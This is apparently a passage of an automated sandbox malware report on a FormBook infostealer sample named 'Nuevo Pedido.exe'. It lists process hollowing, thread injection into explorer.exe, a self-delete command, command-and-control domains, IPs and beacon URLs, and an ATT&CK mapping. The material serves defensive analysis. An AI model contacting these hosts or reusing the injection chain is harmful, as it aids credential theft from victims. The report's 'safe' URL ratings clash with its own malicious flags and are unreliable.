            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04774F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0484070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047758EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04832073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048041E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04793A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04775210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0483EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04804257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0482B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00409B40 LdrLoadDll,
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe | Domain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exe | Domain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exe | Network Connect: 185.53.179.91 80
            Source: C:\Windows\explorer.exe | Domain query: www.tremblock.com
            Source: C:\Windows\explorer.exe | Domain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exe | Domain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
            Source: C:\Windows\explorer.exe | Domain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exe | Domain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exe | Network Connect: 192.232.250.147 80
            Source: C:\Windows\explorer.exe | Network Connect: 185.53.178.53 80
            Source: C:\Windows\explorer.exe | Domain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: A50000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\cscript.exe | Thread register set: target process: 3472
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.290583632.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.285226042.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.272484654.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.251544899.00000000089FF000.00000004.00000001.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
            Source: explorer.exe, 00000005.00000000.279791809.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.242187567.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.258666417.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000005.00000000.242489209.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.280127238.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.259021036.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.503607704.0000000003000000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Users\user\Desktop\Nuevo Pedido.exe VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            Behavior Graph ID: 528617 | Sample: Nuevo Pedido.exe | Startdate: 25/11/2021 | Architecture: WINDOWS | Score: 100
            Top-level signatures in the graph: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures. DNS: www.trenddoffical.com.
            Process chain recovered from the graph:
            Nuevo Pedido.exe (drops C:\Users\user\...\Nuevo Pedido.exe.log, ASCII)
              -> Nuevo Pedido.exe (Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection))
                -> explorer.exe, injected (System process connects to network (likely due to code injection or exploit); contacts thejohnmatt.com 192.232.250.147:80 UNIFIEDLAYER-AS-1US United States, www.tremblock.com 185.53.178.53:80 TEAMINTERNET-ASDE Germany, and 8 other IPs or domains)
                  -> cscript.exe (Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements)
                    -> cmd.exe
                      -> conhost.exe


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            Nuevo Pedido.exe | 33% | Virustotal |
            Nuevo Pedido.exe | 33% | ReversingLabs | Win32.Trojan.FormBook

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            3.0.Nuevo Pedido.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            3.2.Nuevo Pedido.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            3.0.Nuevo Pedido.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            3.0.Nuevo Pedido.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            thejohnmatt.com | 0% | Virustotal |

            URLs

            Source | Detection | Scanner | Label
            http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN | 0% | Avira URL Cloud | safe
            http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN | 0% | Avira URL Cloud | safe
            http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN | 0% | Avira URL Cloud | safe
            http://www.rcepjobs.com | 0% | Avira URL Cloud | safe
            www.spoiledzone.com/udeh/ | 0% | Avira URL Cloud | safe
            http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN | 0% | Avira URL Cloud | safe
            http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.rcepjobs.com | 3.64.163.50 | true | true | | unknown
            www.tremblock.com | 185.53.178.53 | true | true | | unknown
            thejohnmatt.com | 192.232.250.147 | true | true | | unknown
            www.downingmunroe.online | 209.17.116.163 | true | true | | unknown
            www.onlinedatingthaiweb.com | 185.53.179.91 | true | true | | unknown
            www.sosibibyslot.website | unknown | unknown | true | | unknown
            www.securebankofamericalog.site | unknown | unknown | true | | unknown
            www.thejohnmatt.com | unknown | unknown | true | | unknown
            www.trenddoffical.com | unknown | unknown | true | | unknown
            www.blueprintroslyn.com | unknown | unknown | true | | unknown

                              Contacted URLs

                              Name | Malicious | Antivirus Detection | Reputation
                              http://www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN | true | Avira URL Cloud: safe | unknown
                              http://www.thejohnmatt.com/udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN | true | Avira URL Cloud: safe | unknown
                              http://www.onlinedatingthaiweb.com/udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN | true | Avira URL Cloud: safe | unknown
                              www.spoiledzone.com/udeh/ | true | Avira URL Cloud: safe | low
                              http://www.rcepjobs.com/udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN | true | Avira URL Cloud: safe | unknown
                              http://www.tremblock.com/udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN | true | Avira URL Cloud: safe | unknown

                              URLs from Memory and Binaries

                              Name | Source | Malicious | Antivirus Detection | Reputation
                              http://www.rcepjobs.com | cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
